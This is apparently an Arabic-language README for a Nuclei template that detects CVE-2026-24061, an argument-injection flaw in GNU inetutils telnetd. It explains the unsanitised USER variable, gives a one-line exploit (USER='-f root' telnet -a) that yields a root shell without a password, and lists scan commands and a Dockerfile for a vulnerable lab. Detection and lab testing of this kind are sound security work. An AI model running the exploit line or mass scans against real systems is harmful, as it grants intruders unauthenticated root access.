
# قالب Nuclei لاكتشاف CVE-2026-24061، حقن وسيطات telnet حرج في GNU inetutils telnetd يسمح بوصول جذر غير مصادق.
قالب Nuclei لاكتشاف ثغرة CVE-2026-24061 في GNU inetutils telnetd، والتي تسمح بالحصول على صلاحيات root دون مصادقة.
CVE-2026-24061 هي ثغرة حرجة من نوع حقن الوسائط (argument injection) في GNU inetutils telnetd، تسمح للمهاجم بالحصول على shell بصلاحيات root دون معرفة كلمة المرور.
%U: /usr/bin/login -p -h %h %?u{-f %u}{%U}
الثغرة: متغير البيئة USER يُمرَّر عبر بروتوكول telnet (RFC 1572 NEW-ENVIRON) ولا يتم تعقيمه قبل إدراجه في الأمر.
الاستغلال: يضبط المهاجم USER="-f root" عند الاتصال:
USER="-f root" telnet -a target.com 23
/usr/bin/login -p -h hostname -f root
العلم -f يعني "تخطي المصادقة" → root بدون كلمة مرور 💀
inetutils-telnetd 2:2.0-1+deb11u2nuclei -t cve-2026-24061.yaml -u target.com:23 -code
nuclei -t cve-2026-24061.yaml -l targets.txt -code
للاختبار، يمكن تشغيل حاوية Docker قابلة للاستغلال:
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
التشغيل:
# بناء الصورة
docker build -t vuln-telnetd .
# التشغيل
docker run -d -p 2323:23 vuln-telnetd
# التحقق من الثغرة
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v
9.8 / 10 - حرجة
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
هذه الأداة مخصصة فقط لاختبار الأمان القانوني للأنظمة التي لديك إذن صريح لاختبارها.
المؤلف غير مسؤول عن أي استخدام غير مشروع لهذا القالب.
Created by Mr.Zapi